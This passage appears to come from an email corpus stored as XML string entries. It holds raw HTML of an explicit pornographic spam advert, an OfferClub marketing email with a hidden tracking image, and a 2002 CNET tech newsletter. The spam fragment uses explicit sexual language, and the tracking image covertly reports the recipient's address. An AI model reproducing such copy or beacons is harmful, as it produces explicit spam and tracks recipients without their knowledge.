 &lt;b&gt;&lt;/center&gt;Description:&lt;/b&gt; Our girls go from cute, young and innocent, &lt;=
 br&gt;to &lt;i&gt;screaming sex goddess&lt;/i&gt;
  beggin' to have massive cocks in their tight, &lt;br&gt;wet pussies and asses!&lt;=
 br&lt;br
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; &lt;br&gt;
 &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt; &lt;br&gt;  &lt;hr&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;PRE&gt;
 Dear Valued Member,
 OfferClub would like to thank you for the opportunity to present you
 with valuable offers. You are on this list as you indicated that you
 would like to receive special offers from trusted third parties via
 email from us or one of our marketing partners. We maintain a high
 level of customer satisfaction by ensuring periodically that we are
 presenting third party information that you find important and useful.
 To keep hearing from us every so often DO NOTHING.
 We hope you'll stick around to check out our valuable content, but if
 you do not wish to receive our emails please unsubscribe now by
 clicking &lt;a href="http://www.offerclubmail.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here&lt;/a&gt;.
 Thank you,
 OfferClub 
 --------------------------------------------------------------------------------
 IMPORTANT: If this message was sent to you in error, or if you would
 like to unsubscribe please click the link above or cut and paste the
 following link into a web browser:
 http://www.offerclubmail.com/unsubscribe.php?eid=\~moc.cnietonten^^mj\~1754388\~12a1
 --------------------------------------------------------------------------------
 &lt;/PRE&gt;
 &lt;/HTML&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@example.com&amp;oid=offer-09102002-TEXT&amp;custid=offerclubmail" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Digital Dispatch Weekly Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_a.gif" width="442" height="60" border="0" alt="Digital Dispatch"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td width=10 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 					&lt;td  width=430&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
       		&lt;/table&gt;	
 	&lt;/td&gt;
 	&lt;!-- Skyscraper column --&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/dd_b.gif" width=160 height=18&gt;&lt;br&gt;
 &lt;!-- START AD --&gt;
 &lt;!-- shopping  --&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /shopping --&gt;
 &lt;!-- /ad --&gt;
  &lt;br&gt;
 		&lt;!-- right column content --&gt;
 &lt;!-- search form --&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 &lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
  &lt;option value="http://cnet.search.com/search?tag=ex.digital.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.digital.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 				&lt;!-- NEWS BLOCK --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_techNEWS.gif" alt="Tech News News.com" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" cellpadding=0 cellspacing=2 border=0&gt;&lt;tr&gt;
 				&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-aPLsxBpEX3VynhNBuCqlR" &gt;Macworld 2002: New iPods, bigger iMac and more&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI14RdKMuiSkMRUVolYrBeR" &gt;Dell squeezes Pentiums into notebooks&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIw_GUBNEpY0VXXjhrHNHyR" &gt;Microsoft sweetens Mac Office offer&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJWhgClHGGJlh9GpMUHM3FR" &gt;MSN previews next Net service&lt;/a&gt;&lt;p&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWzTR6eGqgsPj9y-DzbW-9R" &gt;Future fuzzy for Adobe camera software&lt;/a&gt;&lt;p&gt;
 &lt;p&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZzgRLDoTLbDr4q1O7VpJcR" &gt;More CNET News&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 				&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /NEWS BLOCK --&gt;
 				 &lt;br&gt;
 				&lt;!-- TOP DOWNLOADS --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_TOPdwnlds.gif" alt="Top Downloads" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_IMRh5s6epVb8HYULuonXiR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZFS_hxQGxsIC1b2OB8OEPR" &gt;Opera 6.04&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZpCMAiFZ6RaT-Dc13yE_rR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWTQ2zt01j7c7YuNDxuyCiR" &gt;FileMaker Pro 6.0v2&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyslCNlOCGjnbcumX6cvbPR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO1bOfBUIPtvDA4oSMpoLnR" &gt;Balls of Steel Patch 1.3&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjD91yzDgcsUb9HGRJ1bfeR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIczi7p1RRIfgeUef92iqrwyR" &gt;Marine Aquarium 0.99.0 (for the Mac)&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /TOP DOWNLOADS --&gt;
 				 &lt;br&gt;
 				&lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjIiVp03FUhCGLs-y39w-_lR" &gt;Samsung ML-1430 laser printer&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=4e-0Y95InZ3aFUHi6kIKlsTn8N_Jj9R" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLecuWIM_dNGWF8w6YrPhsR" &gt;Unitech 2U4U DMR-300 MP3 player&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBe5mG-XiMmFz_e0CvgpaFR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCnqnXTcMyCPDuYWD0V_Wy4R" &gt;Video Explosion Deluxe&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU2RSEHGrgfQffN5r5ls4rR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUsXVk1xI5lq9S_p8qkEiiR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsJFTE394BFjAi_TOlRfXPR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 		&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section --&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;td width=430 bgcolor="#ffffff"&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 			&lt;tr valign=top&gt;
 			&lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;td width=412&gt;
 			&lt;table cellpadding=8 cellspacing=0 border=0&gt;
 &lt;!-- date --&gt;				&lt;tr&gt;&lt;td&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 18, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 			&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr valign=top&gt;
 					&lt;td width=76 align=right&gt;
 						&lt;img src="http://www.cnet.com/i/dp/hd_janicec.gif" width="66" height="86" border="0"&gt;&lt;br&gt;
 						&lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
 						--Janice Chen,&lt;br&gt;
 						editor in chief,&lt;br&gt;
 						CNET Reviews&lt;br&gt;
 						&lt;/font&gt;
 					&lt;/td&gt;
 					&lt;td width=10&gt; &lt;/td&gt;
 					&lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
 						&lt;font color="#333333"&gt;&lt;B&gt;Dear readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 						&lt;font size="-1"&gt;
 The majority of PC users may run Windows, but Microsoft can't
 touch the passion that Mac users bring to computing. This week,
 Apple devotees gathered in New York to find out what their guru,
 Steve Jobs, has in store for them. They were not disappointed,
 with offerings ranging from the new iMacs, which continue to push
 the boundaries of the PC form factor, to updated iPods that
 include more memory, better menus, and compatibility with
 Windows. Read the 
 &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyI69zCJKOENBEZdihv9KnR" &gt;full coverage&lt;/a&gt; from 
 CNET's News.com.
 &lt;br&gt;
 &lt;/font&gt;&lt;br&gt;
 					&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;font size=1&gt; &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 				&lt;td width="175"&gt;&lt;a href="#buzz"&gt;&lt;img src="http://www.cnet.com/i/dp/THISweeks_BUZZ.gif" alt="This Week's Buzz Meter" width="175" height="18" border="0"&gt;&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;td align="left"&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;&lt;a href="#buzz"&gt;Readers mourn Gene Kan&lt;/a&gt;&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 				&lt;/tr&gt;
 				&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" height="8" width="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;/table&gt;
 			&lt;/td&gt;
 			&lt;td width=8&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
 			&lt;/tr&gt;
 			&lt;/table&gt;
 	&lt;!-- bottom rule --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
 	&lt;tr valign=top&gt;
 		&lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;table cellpadding=10 cellspacing=0 border=0 width=430&gt;
 &lt;tr&gt;&lt;td&gt;
 			&lt;font face="Arial, Helvetica"&gt;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href="http://clickthru.online.com/Click?q=f8-57BSQfscKTcRFQIpiaRL6DCwoliR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/0622022ghz1.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr1Rb1TCo6Nv0T0QkY6b7PR" &gt;&lt;b&gt;2GHz to go&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;Check out the first 2GHz portable powerhouses from Dell and WinBook that push the performance envelope.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrd3QQ9RyUVuo4I9yc99NcnR" &gt;IBM thin-and-light ThinkPads fit to a T
 &lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzTGPNTWRwQ93KjZ6eJcneR" &gt;HP xe4500: the last of the Omnibooks&lt;/a&gt;&lt;br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 products&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;Notebooks&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpziJtLDdnAu7hgvo2AKesR" &gt;Gateway 600XL&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=61-x9oAIoL8tQUtYFj4JYndFK-AWlFR" &gt;Dell Inspiron 2600 series
 &lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=76-vJf7InBWAWldqTP1okYP2r70U69R" &gt;Dell Inspiron 8200 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=8b-SBGBQY0Vlo5uiYmEYIEElDh4B1rR" &gt;Toshiba Satellite 2400-S251&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=a0-11h8QQB7cNNVOGlUByjw2PB1s7iR" &gt;Toshiba Satellite 5105-S607&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKVBmP2rcjT_PUCch20Lg4R" &gt;See all most popular notebooks&lt;/a&gt;&lt;/b&gt;&lt;br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 software --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_soft.gif" alt="Software" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsQXvzTJqqyXYHRf_uaHkrR" &gt;PIMs on the side&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;Whatever happened to the straightforward, dedicated PIM?
    PIM/contact managers, such as the ubiquitous Outlook and
    Lotus, pushed them to the sidelines. But a few PIMs survived
    this enforced obscurity. If you need a plain PIM that doesn't
    cost a fortune, one of these may tickle your fancy.
 &lt;a href="http://clickthru.online.com/Click?q=e0-cISRQfDxnLmGawmkPhB7mxUT9AiR" &gt;More software&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /software --&gt;
 &lt;p&gt;
 &lt;!-- hardware --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_hard.gif" alt="Hardware" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=f5-lTbRQgwH2ECsfuz6DmLwgkaZmRPR" &gt;Apple eMac not just for education anymore&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Ideally suited to students living in small spaces and home
    users with basic needs, the eMac is an attractive, adequately
    speedy, and easy-to-use PC without the flat-panel iMac's
    relatively high price. Wondering whether to go CRT or
    flat-panel? Read our review.
 &lt;a href="http://clickthru.online.com/Click?q=0a-ZnKCIrrwX4iQTlhBwhq6GOxuYznR" &gt;More desktops&lt;/a&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58sviEYt-V1xmYgHobjqmeR" &gt;Read the review&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
    &lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcdj2dG48hN3_tvVyn4IcgyR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /hardware --&gt;
 &lt;p&gt;
 &lt;p&gt;
 &lt;!-- electronics --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_ele.gif" alt="Electronics" width="120" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpGf4f1KzKVX4RVXFO5JSFR" &gt;MiniDV maestro&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Sony's DCR-VX2000 gives prosumers a versatile tool for
    capturing high-quality digital video. With three CCDs, smooth
    performance, and excellent low-light capability, this
    camcorder meets the demands of avid videographers where lesser
    cameras fail.
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96dWzPihsnStcVTQzc9R" &gt;More in digital photo&lt;/a&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZG-VJ6EyaRYG8Y0gSPZxsR" &gt;Read the review&lt;/a&gt;&amp;nbsp;&amp;#124;&amp;nbsp;
    &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J2r6NWVqikUMBXB6W5WWlR" &gt;Check latest prices&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 &lt;p&gt;
 &lt;!-- wireless --&gt;
 &lt;img src="http://www.cnet.com/i/dp/shdr_wi.gif" alt="Wireless" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;!-- insert promo GIF here --&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMrKK9lE7bHSCN0U7nQUD4R" &gt;Cordless phones: the other wireless devices&lt;/a&gt;&lt;/b&gt;&lt;br&gt;&lt;/font&gt;
 &lt;font size="-1"&gt;In the market for a new cordless phone but don't know whether
    to buy a 900MHz or 2.4GHz model or which manufacturers offer
    the best products? No sweat: check out our new line coverage to
    find the phone that fits your personal style and needs.
 &lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKF7r0ECyPAE64qDAwrPGrR" &gt;More in wireless phones&lt;/a&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;!-- /wireless --&gt;
 &lt;p&gt;
 &lt;br clear=left&gt;
 &lt;a name="buzz"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 &lt;tr valign=bottom&gt;&lt;td width=70 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/dp/BUZZMETER.gif" width=90 height=15 alt="Buzz Meter"&gt;&lt;/td&gt;
 &lt;td width=339&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt;&amp;nbsp;Readers mourn Gene Kan&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=14&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=2 bgcolor="#CC9999"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;font face="arial, helvetica" size="-1"&gt;
 Peer-to-peer pioneer dies, Macworld kicks off in Manhattan, and
 the PayPal/eBay merger is not going so well.&lt;/font&gt;
 &lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;i&gt;--Laura Lindhe, executive editor, CNET Tech Trends&lt;/i&gt;&lt;/font&gt;
 &lt;p&gt; 
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
